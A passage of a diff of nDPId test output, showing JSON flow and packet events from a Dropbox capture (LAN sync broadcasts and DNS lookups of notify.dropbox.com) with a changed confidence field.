{"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADf1cRAAEAR35DAqAFpwKgB\/0RcRFwAywVkeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADf1cRAAEAR35DAqAFpwKgB\/0RcRFwAywVkeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182818229,"flow_last_seen":1459182818229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182818229,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1459182818229,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182818229,"pkt":"8IQvSpdgeJKcD6iOCABFAABAQCRAAEARddHAqAFpwKgB\/oGlADUALERt3H0BAAABAAAAAAAABm5vdGlmeQdkcm9wYm94A2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182818229,"flow_last_seen":1459182818229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182818229,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182818229,"flow_last_seen":1459182818229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182818229,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1459182818229,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182818229,"pkt":"8IQvSpdgeJKcD6iOCABFAABAQCRAAEARddHAqAFpwKgB\/oGlADUALERt3H0BAAABAAAAAAAABm5vdGlmeQdkcm9wYm94A2NvbQAAAQAB"} 
00773{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":829,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1459182818263,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1459182818263,"pkt":"eJKcD6iO8IQvSpdgCABFAAEYAABAAEARtR3AqAH+wKgBaQA1gaUBBH9u3H2BgAABAAEABAAEBm5vdGlmeQdkcm9wYm94A2NvbQAAAQABwAwAAQABAAAAcQAEon0Rg8AMAAIAAQAAAHEAFwducy0xMTU0CWF3c2Rucy0xNgNvcmcAwAwAAgABAAAAcQASBW5zLTgzCWF3c2Rucy0xMMAbwAwAAgABAAAAcQAWBm5zLTg5NQlhd3NkbnMtNDcDbmV0AMAMAAIAAQAAAHEAGQducy0xOTM2CWF3c2Rucy01MAJjbwJ1awDAYwABAAEAAVOfAATN+8BTwIEAAQABAAFTrgAEzfvDf8BAAAEAAQABU6sABM37xILAowABAAEAAVN1AATN+8eQ"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":829,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1459182818263,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.17.131"}} 
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":829,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1459182818263,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.17.131"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","packets-captured":837,"packets-processed":836,"total-skipped-flows":0,"total-l4-payload-len":52930,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":6,"total-updates":0,"current-active-flows":7,"total-active-flows":11,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":69,"global_ts_msec":1535391465534} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465534,"flow_last_seen":1535391465534,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1535391465534,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391465534,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEWzxAAEARHT\/AqAEG\/\/\/\/\/0RcRFwAsAWteyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465534,"flow_last_seen":1535391465534,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465534,"flow_last_seen":1535391465534,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465535,"flow_last_seen":1535391465535,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1535391465535,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391465535,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADENtRAAEARfv\/AqAEGwKgB\/0RcRFwAsEMFeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465535,"flow_last_seen":1535391465535,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":151,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":1054,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465535,"flow_last_seen":1535391465535,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":151,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":1054,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1535391495539,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391495539,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEaV5AAEARDx3AqAEG\/\/\/\/\/0RcRFwAsAWteyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1535391495539,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391495539,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEPR9AAEAReLTAqAEGwKgB\/0RcRFwAsEMFeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1535391525545,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391525545,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEd25AAEARAQ3AqAEG\/\/\/\/\/0RcRFwAsAWteyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1535391525545,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391525545,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADETEZAAEARaY3AqAEGwKgB\/0RcRFwAsEMFeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651168,"flow_last_seen":1535391651168,"flow_idle_time":200000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
